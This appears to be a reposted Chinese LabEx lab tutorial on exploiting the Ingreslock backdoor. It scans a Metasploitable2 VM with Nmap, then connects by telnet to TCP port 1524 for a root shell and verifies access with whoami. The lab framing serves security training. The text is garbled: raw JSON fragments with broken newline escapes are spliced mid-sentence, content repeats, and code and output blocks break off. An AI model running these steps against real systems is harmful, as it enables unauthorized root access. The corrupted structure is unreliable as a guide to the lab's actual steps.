如何使用Nmap检测并利用Ingreslock漏洞进行安全测试
介绍 在本次实验里,你会学到怎样凭借Ingreslock服务漏洞来获取目标机器的root权限。实验环境是基于LabEx所提供的Kali和Metasploitable2虚拟机构建的。本实验的目的在于让你明白Ingreslock漏洞,运用Nmap展开渗透扫描,最终借助Ingreslock后门取得
### 介绍
在本次实验里,你会学到怎样凭借Ingreslock服务漏洞来获取目标机器的root权限。实验环境是基于LabEx所提供的Kali和Metasploitable2虚拟机构建的。本实验的目的在于让你明白Ingreslock漏洞,运用Nmap展开渗透扫描,最终借助Ingreslock后门取得Metasploitable2机器的root权限。
### 了解Ingreslock漏洞并搭建环境
Ingreslock漏洞是一个虽古老但仍具关联性的安全缺陷,它和Ingres数据库管理系统(DBMS)有关。攻击者常常把TCP端口1524当作后门端口,以保持对受攻击系统的访问。
在这一步骤中,你要去了解Ingreslock漏洞及其影响。
Ingreslock漏洞的根源在于,TCP端口1524通常会被攻击者在成功入侵系统后作为后门监听端口。利用这个漏洞的简单之处在于,只要连接到开放的端口,就能获得目标机器的root级别访问权限。
虽然这个漏洞被认为比较古老,但它仍存在于一些遗留系统中,所以在受控环境中去理解和探究它依旧有价值。
1. 在LabEx主机上开启一个xfce终端,接着通过运行如下命令来启动Metasploitable2目标机:
```bash
sudo virsh start Metasploitable2
```
等待目标机器启动。,可能需要 1-3 分钟。nn2. 通过 ping 测试与目标机的连接性:nn```bashnping 192.168.122.102n```nn按 `Ctrl+C` 停止 ping。nn3. 启动 Kali Linux 容器并通过以下命令进入 bash 环境:nn```bashndocker run -ti --network host b5b709a49cd5 bashn```nn4. 在 Kali 容器内,测试与目标机的网络连接:nn```bashnping 192.168.122.102n```nn按 `Ctrl+C` 停止 ping。n","need_verify":true,"has_solution":false},{"position":2,"title":"进行渗透扫描","layout":"doc-workbench-split","text":"## 进行渗透扫描nn在这一步中,你将使用 Nmap 对 Metasploitable2 目标机执行渗透扫描,以识别目标机上开放的端口和运行的服务。nn1. 启动 Metasploitable2 虚拟机并确保其正在运行。n2. 启动 Kali 容器并进入 bash shell。n3. 在 Kali 容器内,运行以下命令对目标机执行全面扫描:nn```bashnnmap -sV -T4 target-ip-addressn```nn`-sV` 选项指示 Nmap 探测开放端口以确定服务/版本信息,而 `-T4` 将定时模板设置为激进级别(从 0 到 5 的更高值会增加激进程度)。nn启动 PostgreSQL 服务并初始化 Metasploit 数据库:nn```bashncd ~nservice postgresql startnmsfdb initn```nn启动 Metasploit 控制台:nn```ba在目标机上执行全面扫描:
```bash
nmap -T4 -A -v 192.168.122.102
```
以下是输出示例:
```plaintext
[*] exec: nmap -T4 -A -v 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-24 20:47 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0037s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DA V/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd
``` 3.X - 4.X (workgroup: WORKGROUP)n512/tcp open exec?n513/tcp open loginn514/tcp open shell?nn...n```nn这一系列命令启动了 PostgreSQL 服务,初始化了 Metasploit 数据库,启动了 Metasploit 控制台,然后使用 Nmap 对目标机执行了全面扫描。nn**按 Ctrl+D 退出 Metasploit 控制台,然后开始检查**n","need_verify":true,"has_solution":false},{"position":3,"title":"利用 Ingreslock 后门","layout":"doc-workbench-split","text":"## 利用 Ingreslock 后门nn在这一步中,你将利用 Ingreslock 后门漏洞获取 Metasploitable2 目标机的 root 权限。nn1. 首先,如果你不在 Metasploit 控制台中,请启动 Metasploit 控制台:nn```bashncd ~nmsfconsolen```nn2. 在 Metasploit 控制台中安装 `telnet` 包:nn```bashnapt-key del ED444FF07D8D0BF6 && apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ED444FF07D8D0BF6 && apt update && apt install telnetn```nn3. 使用 `telnet` 命令连接到目标机的 Ingreslock 后门端口:nn```bashntelnet 192.168.122.102 1524n```nn如果连接成功,你应该会获得目标机的 root 权限。nn4. 现在,你需要通过检查被入侵机器的 IP 地址、主机名和当前用户来验证 Ingreslock 后门的利用是否成功。通过 Ingreslock 后门连接到目标机后,运行以下命令:nn检查被入侵机器的 IP 地址:nn```bashnifconfign```nn检查被入侵机器的主机名:nn```bashnhostnamen```nn检查被入侵机器的当前用户:nn```bashnwhoamin```nn如果利用成功,你应该会看到目标机的 IP 地址、主机名以及当前用户为 `root`。nn**按 Ctrl+D 退出 Metasploit 控制台,然后开始检查**n","need_verify":true,"has_solution":false},{"position":4,"title":"总结","layout":"doc-fullscreen","text":"## 总结nn在本实验中,你了解了 Ingreslock 漏洞,该漏洞允许攻击者通过连接到 TCP 端口 1524 获取受攻击系统的 root 权限。你使用 Nmap 执行了渗透扫描,以识别目标机上开放的端口和服务。在检测到 Ingreslock 后门端口后,你利用 `telnet` 命令成功利用了该漏洞,获取了 root 权限。最后,你通过检查被入侵机器的 IP 地址、主机名和当前用户,验证了漏洞利用的成功。本实验为你提供了理解和利用真实世界漏洞的实践经验,强调了安全补丁和系统加固以防止此类后门的重要性。n","need_verify":false,"has_solution":false}
来源:https://labex.io/zh/tutorials/nmap-exploit-ingreslock-vulnerability-with-nmap-416124
本站内容用于信息整理与展示,如有侵权或内容问题请及时联系处理。
相关推荐
补充同频道和同主题内容,方便继续浏览更多相关内容。
同类最新
继续查看同栏目最近更新的文章。
DDoS攻击的三大主要形式:原理、特征与防御重点
DDoS攻击主要分为基于流量(Volume)、基于应用层(Application)和基于协议(Protocol)三种形式。流量型攻击通过海量数据淹没带宽;应用层攻击利用Web漏洞耗尽服务器资源;协议层攻击则利用TCP握手缺陷导致系统挂起。了解这些原理是制定针对性防御策略的基础。
如何有效预防和缓解DDoS攻击:5大核心策略详解
面对DDoS攻击,单纯增加带宽已非长久之计。本文详解5大核心防护策略:优化网络硬件配置、建立DNS冗余机制、部署透明缓解技术、引入负载平衡器及专用Anti-DDoS模块。通过合理组合这些技术手段,可有效抵御SYN泛洪、Slowloris等常见攻击,保障业务连续性与网站可用性。
DDoS防护四大误区:CDN、防火墙与黑名单的局限性解析
许多企业误以为CDN、防火墙或黑名单能完全抵御DDoS攻击。本文深入解析四大常见误区:CDN仅提供部分缓解、静态黑名单易失效、防火墙算力有限且可能成为目标、阈值警报仅具滞后性。了解这些局限性,有助于构建更立体的防御体系,避免在攻击发生时措手不及。
常见DDoS攻击类型详解:原理、特征与防御策略
本文详细解析四种常见DDoS攻击类型:SYN Flood利用TCP三次握手缺陷耗尽资源;UDP Flood通过海量数据包造成带宽拥塞;ICMP Flood利用Ping请求消耗系统算力;应用层Flood针对Web脚本进行高频请求。了解其原理是制定有效防御策略的基础。
如何有效抵御DDOS攻击:4种核心防护方案解析
面对DDOS攻击,企业需构建多层防护体系。本文详解四大核心策略:利用反向路由器查询进行流量清洗,通过GCDN智能分配节点隐藏源站IP,部署负载均衡硬件分担压力,以及接入高防机房抵御数百G恶意流量。掌握这些技术,可最大程度保障业务连续性。
